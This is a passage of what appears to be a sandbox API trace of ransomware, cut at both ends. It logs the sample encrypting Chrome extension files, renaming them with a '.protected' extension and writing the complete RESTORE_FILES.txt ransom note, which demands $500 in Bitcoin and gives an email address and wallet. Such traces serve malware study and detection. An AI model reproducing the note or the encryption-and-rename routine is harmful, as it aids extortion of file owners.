"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.protected")) returned 1 [0081.424] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.424] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.424] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0081.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.425] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.425] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.426] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.426] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.426] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.426] CloseHandle (hObject=0x164) returned 1 [0081.426] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0081.426] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi") returned 141 [0081.426] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0081.426] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0081.426] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*") returned 143 [0081.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\.") returned 143 [0081.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.427] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.427] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.427] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.427] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\..") returned 144 [0081.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.427] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.427] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.427] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.427] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.428] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.428] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.428] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.428] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x121, lpOverlapped=0x0) returned 1 [0081.429] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.429] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x121, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x121, lpOverlapped=0x0) returned 1 [0081.429] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.429] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.429] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.429] CloseHandle (hObject=0x168) returned 1 [0081.429] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.protected") returned 165 [0081.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.protected")) returned 1 [0081.430] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.430] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.430] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0081.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.430] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.430] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.431] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.431] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.431] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.431] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.432] CloseHandle (hObject=0x164) returned 1 [0081.432] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0081.432] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr") returned 141 [0081.432] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0081.432] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0081.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*") returned 143 [0081.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.432] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.432] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.432] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.432] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.432] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\.") returned 143 [0081.432] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.432] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.432] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.432] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.432] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.432] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.432] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\..") returned 144 [0081.432] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.433] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.433] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.433] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.433] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.433] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.434] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0081.435] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.435] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0081.435] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.435] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.435] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.435] CloseHandle (hObject=0x168) returned 1 [0081.435] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.protected") returned 165 [0081.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.protected")) returned 1 [0081.436] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.436] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.436] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 